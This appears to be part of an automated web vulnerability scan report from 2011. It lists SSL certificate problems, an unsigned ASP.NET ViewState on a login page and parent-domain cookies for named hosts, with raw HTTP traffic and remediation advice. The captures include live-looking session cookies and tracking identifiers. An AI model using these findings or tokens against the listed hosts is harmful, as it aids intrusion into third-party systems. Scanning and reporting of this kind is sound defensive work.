<p><a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store_Front&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s">Store Front</a>
...[SNIP]...
<td valign="top" align="left"><a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=9990&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s"><img src="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DACTION/WebsGetImageThumb/Inventory/9990" alt="Camera Strap Black" align="top" border="0">
...[SNIP]...
<div align="left">
                                   OP TECH Weight Reduction System Classic Camera strap with silkscreened NANPA logo ...<a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=9990&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s">More Info</a>
...[SNIP]...
<td valign="top" align="left"><a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=3386&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s"><img src="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DACTION/WebsGetImageThumb/Inventory/3386" alt="Camera Strap Forest Green" align="top" border="0">
...[SNIP]...
<div align="left">
                                   OP TECH Weight Reduction System Classic Camera strap with silkscreened NANPA logo ...<a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=3386&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s">More Info</a>
...[SNIP]...
<td valign="top" align="left"><a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=3387&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s"><img src="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DACTION/WebsGetImageThumb/Inventory/3387" alt="Memory Card Case" align="top" border="0">
...[SNIP]...
<div align="left">
                                   Neoprene, belt loop, 7 laminated-mesh pockets. Made by Lowepro. ...<a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=3387&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s">More Info</a>
...[SNIP]...
<td valign="top" align="left"><a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=13155&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s"><img src="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DACTION/WebsGetImageThumb/Inventory/13155" alt="NANPA Logo Window Static Cling Decal" align="top" border="0">
...[SNIP]...
<div align="left">
                                   Transparent NANPA Logo Window Static Cling Decal....<a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=13155&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s">More Info</a>
...[SNIP]...

10. SSL certificate  previous  next
There are 6 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



10.1. https://extranet.connexon.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://extranet.connexon.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  support.connexon.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Sep 23 09:04:22 CDT 2010
Valid to:  Fri Aug 19 09:36:18 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

10.2. https://gvnwlnp.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://gvnwlnp.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  www.gvnwlnp.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Oct 01 16:59:32 CDT 2009
Valid to:  Sat Oct 01 16:17:56 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

10.3. https://lnp.activationnow.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://lnp.activationnow.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  lnp.activationnow.com
Issued by:  lnp.activationnow.com
Valid from:  Mon Aug 09 12:46:36 CDT 2004
Valid to:  Sun Sep 08 23:00:00 CDT 2024

10.4. https://catalyst.fastcatalog.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://catalyst.fastcatalog.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.fastcatalog.net
Issued by:  GeoTrust SSL CA
Valid from:  Tue Oct 12 22:01:03 CDT 2010
Valid to:  Thu Oct 15 06:12:18 CDT 2015

Certificate chain #1

Issued to:  GeoTrust SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:39:26 CST 2010
Valid to:  Tue Feb 18 16:39:26 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022

10.5. https://support.connexon.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.connexon.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  support.connexon.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Sep 23 09:04:22 CDT 2010
Valid to:  Fri Aug 19 09:36:18 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

10.6. https://www.nationalnanpa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nationalnanpa.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.nationalnanpa.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Wed Jan 27 00:46:28 CST 2010
Valid to:  Sat Jan 28 15:44:07 CST 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

11. ASP.NET ViewState without MAC enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://gvnwlnp.com
Path:   /login.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

Request

GET /login.aspx HTTP/1.1
Host: gvnwlnp.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pf0wts55rdy2k0bdceo0lu45

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 00:50:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   LNP Login
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEwNTQyNzQyMzMPZBYCZg9kFgICAw9kFgICBQ9kFgICAQ9kFgJmD2QWAgINDxAPFgIeB0NoZWNrZWRoZGRkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUrY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRMb2dpbjEkUmVtZW1iZXJNZQ==" />
...[SNIP]...

12. Cookie scoped to parent domain  previous  next
There are 13 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


12.1. http://www.secviz.org/node/89  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.secviz.org
Path:   /node/89

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /node/89 HTTP/1.1
Host: www.secviz.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:56 GMT
Server: Apache/2.2.17
Set-Cookie: SESS511f69598f6d24673b9cd181bd44c360=3679a5a8e5f156807fb4105e9bf204df; expires=Sat, 04-Jun-2011 04:22:16 GMT; path=/; domain=.secviz.org
Last-Modified: Wed, 11 May 2011 22:47:09 GMT
ETag: "13ef58d2264914230329c15df5277159"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 17680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title>The D
...[SNIP]...

12.2. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;225879025;40290099;m HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.vonage.com/lp/US/afflpdc/?refer_id=AFLGN090801001W1&promo_id=USVONRP2499NSC_WEB&deviceType=VDV21_FREE_UPSELL
Set-Cookie: id=22fba3001601008d|2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 12 May 2011 00:50:28 GMT
Server: GFE/2.0
Content-Type: text/html


12.3. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=662363118&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.redskye911.com%252Fe911_products%252F%26jsref%3Dhttp%253A%252F%252Fwww.redskye911.com%252F%26rnd%3D1305162438995&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&jsref=http%3A%2F%2Fwww.redskye911.com%2F&rnd=1305162438995
Cookie: UID=7278cea-24.143.206.58-1297260492

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 12 May 2011 01:07:20 GMT
Connection: close
Set-Cookie: UID=7278cea-24.143.206.58-1297260492; expires=Sat, 11-May-2013 01:07:20 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


12.4. http://id.google.com/verify/EAAAANsBmSEnaufGrFO2VVQlXFg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAANsBmSEnaufGrFO2VVQlXFg.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAANsBmSEnaufGrFO2VVQlXFg.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=number+porting+lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=ShaN536VX1BT-W8jSCkNsB7UCdsHHBFwvL-fv0GuHA=AXsz92cQ6dNvC4Zp; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=THnvL1Oo2rFB1EyPuENlypklsUgiuRDrggMizX7GcvuSEWk1O1BRhP0HMsig4_tUMgrpgSA4JfKinmjR9Q08mpbqo9YLMeQa1bwUSS3rWNSNQKH_51QqwF1Bj_TupkUW

Response

HTTP/1.1 200 OK
Set-Cookie: NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj; expires=Fri, 11-Nov-2011 00:43:59 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 12 May 2011 00:43:59 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

12.5. http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.connectedplanetonline.com
Path:   /b/ss/primediateleph/1/H.22.1/s8270624386612

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/primediateleph/1/H.22.1/s8270624386612?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A54%203%20300&ce=UTF-8&ns=pentonmedia&pageName=bss_oss%3Anews%3APurchase%20from%20Evolving%20Systems%20will%20broaden%20Neustar%20numbering%20solutions%20business&g=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&cc=USD&ch=bss_oss&events=event18%2Cevent1&c2=connectedplanetonline.com&c6=article&c7=%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2Findex.html&c9=By%20Joan%20Engebretson&c10=Apr%2022%2C%202011%2012%3A42%20PM&c13=Anonymous&c51=did%20not%20bounce&v51=Media%20Visions&c52=Direct%20Traffic&v52=Software%20%26%20Technology%3A%20Electrical%20Components&c53=Direct%20Traffic&v53=10&v54=5065&v55=Birmingham%2C%20AL%20%20%2035210&v56=Not%20Defined&v57=D%3Dch&c58=D%3DpageName&v58=D%3DpageName&v60=D%3DUser-Agent&v61=%2B1&v64=D%3Dc53&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.connectedplanetonline.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: intro=1; s_pers=%20s_visit%3D1%7C1305163014885%3B%20s_depth%3D1%7C1305163014886%3B%20s_dirL%3D1%7C1305163014889%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cm%3DundefinedDirect%2520LoadDirect%2520Load%3B%20gpb_tdt%3DDirect%2520Traffic%3B

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:47:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E59718851D25A3-60000128800E6F4B[CE]; Expires=Tue, 10 May 2016 00:47:45 GMT; Domain=.connectedplanetonline.com; Path=/
Location: http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612?AQB=1&pccr=true&vidn=26E59718851D25A3-60000128800E6F4B&&ndh=1&t=11%2F4%2F2011%2019%3A46%3A54%203%20300&ce=UTF-8&ns=pentonmedia&pageName=bss_oss%3Anews%3APurchase%20from%20Evolving%20Systems%20will%20broaden%20Neustar%20numbering%20solutions%20business&g=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&cc=USD&ch=bss_oss&events=event18%2Cevent1&c2=connectedplanetonline.com&c6=article&c7=%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2Findex.html&c9=By%20Joan%20Engebretson&c10=Apr%2022%2C%202011%2012%3A42%20PM&c13=Anonymous&c51=did%20not%20bounce&v51=Media%20Visions&c52=Direct%20Traffic&v52=Software%20%26%20Technology%3A%20Electrical%20Components&c53=Direct%20Traffic&v53=10&v54=5065&v55=Birmingham%2C%20AL%20%20%2035210&v56=Not%20Defined&v57=D%3Dch&c58=D%3DpageName&v58=D%3DpageName&v60=D%3DUser-Agent&v61=%2B1&v64=D%3Dc53&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:47:45 GMT
Last-Modified: Fri, 13 May 2011 00:47:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www268
Content-Length: 0
Content-Type: text/plain


12.6. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
